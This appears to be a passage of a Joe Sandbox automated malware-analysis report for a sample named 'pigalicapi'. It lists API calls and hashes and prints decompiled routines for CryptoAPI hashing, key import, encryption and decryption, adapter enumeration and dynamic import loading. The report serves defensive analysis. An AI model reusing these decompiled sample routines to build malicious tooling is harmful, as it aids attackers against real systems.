                                                                                                                                                                                                                                                                          0x04008c79
                                                                                                                                                                                                                                                                          0x04008c7b
                                                                                                                                                                                                                                                                          0x04008c82
                                                                                                                                                                                                                                                                          0x04008c8b
                                                                                                                                                                                                                                                                          0x04008c99
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cae
                                                                                                                                                                                                                                                                          0x04008cb7
                                                                                                                                                                                                                                                                          0x04008cc1
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008c42

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							_t43 = CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24); // executed
                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                          								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                          								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04008a76
                                                                                                                                                                                                                                                                          0x04008a81
                                                                                                                                                                                                                                                                          0x04008ba3
                                                                                                                                                                                                                                                                          0x04008ba9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                          0x04008ac9
                                                                                                                                                                                                                                                                          0x04008ad3
                                                                                                                                                                                                                                                                          0x04008adb
                                                                                                                                                                                                                                                                          0x04008ae3
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b01
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                          0x04008b16
                                                                                                                                                                                                                                                                          0x04008b1c
                                                                                                                                                                                                                                                                          0x04008b37
                                                                                                                                                                                                                                                                          0x04008b3f
                                                                                                                                                                                                                                                                          0x04008b41
                                                                                                                                                                                                                                                                          0x04008b5e
                                                                                                                                                                                                                                                                          0x04008b66
                                                                                                                                                                                                                                                                          0x04008b80
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008b16

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(10004054,10004040), ref: 10001047
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1000104E
                                                                                                                                                                                                                                                                            • Part of subcall function 10001B30: SetLastError.KERNEL32(0000000D,?,10001070,?,00000040), ref: 10001B3D
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1), ref: 10001096
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.608609386.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction ID: de8a46b343c4f85be80e433d7a8ef3539ae306dd3111f157e8541b0b80b52991
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dc4c1101507dda9be7d1ca017cc9ed333707a61feece7f86d76402a0b178a7c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44F1C3B4A01209EFEB04CF94C990A9EB7B5FF48384F208598E915AB395D735EE41DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                          • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                          			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                                                          				char* _t47;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t47 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                          							_t33 = _v20;
                                                                                                                                                                                                                                                                          							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                          							_v8 = _t33;
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                          0x04008976
                                                                                                                                                                                                                                                                          0x04008981
                                                                                                                                                                                                                                                                          0x04008a60
                                                                                                                                                                                                                                                                          0x04008a66
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                          0x040089b5
                                                                                                                                                                                                                                                                          0x040089bf
                                                                                                                                                                                                                                                                          0x040089c7
                                                                                                                                                                                                                                                                          0x040089cf
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x040089ed
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                          0x04008a02
                                                                                                                                                                                                                                                                          0x04008a04
                                                                                                                                                                                                                                                                          0x04008a27
                                                                                                                                                                                                                                                                          0x04008a3d
                                                                                                                                                                                                                                                                          0x04008a41
                                                                                                                                                                                                                                                                          0x04008a47
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04008a02

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                          			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                          					if(_a8 > 5) {
                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                          						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                          						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                          						_v28 = _t59;
                                                                                                                                                                                                                                                                          						_v12 = _v28;
                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v12;
                                                                                                                                                                                                                                                                          							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                          							_push( &_v20);
                                                                                                                                                                                                                                                                          							_t64 = _v12;
                                                                                                                                                                                                                                                                          							_push(_t64); // executed
                                                                                                                                                                                                                                                                          							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                          										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                          										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                          										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                          										_v12 =  *_v12;
                                                                                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *_a12 = _v24;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v32 = _v16;
                                                                                                                                                                                                                                                                          							E040097C0(_v32); // executed
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                          0x04009f76
                                                                                                                                                                                                                                                                          0x04009f81
                                                                                                                                                                                                                                                                          0x04009f87
                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                          0x04009f94
                                                                                                                                                                                                                                                                          0x04009fad
                                                                                                                                                                                                                                                                          0x04009fb2
                                                                                                                                                                                                                                                                          0x04009fb5
                                                                                                                                                                                                                                                                          0x04009fbb
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009fcb
                                                                                                                                                                                                                                                                          0x04009fe0
                                                                                                                                                                                                                                                                          0x04009fe6
                                                                                                                                                                                                                                                                          0x04009fe7
                                                                                                                                                                                                                                                                          0x04009fea
                                                                                                                                                                                                                                                                          0x04009feb
                                                                                                                                                                                                                                                                          0x04009ff2
                                                                                                                                                                                                                                                                          0x04009ff4
                                                                                                                                                                                                                                                                          0x04009ffb
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a034
                                                                                                                                                                                                                                                                          0x0400a039
                                                                                                                                                                                                                                                                          0x0400a048
                                                                                                                                                                                                                                                                          0x0400a050
                                                                                                                                                                                                                                                                          0x0400a053
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a05e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a06b
                                                                                                                                                                                                                                                                          0x0400a072
                                                                                                                                                                                                                                                                          0x0400a077
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                          0x0400a080

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
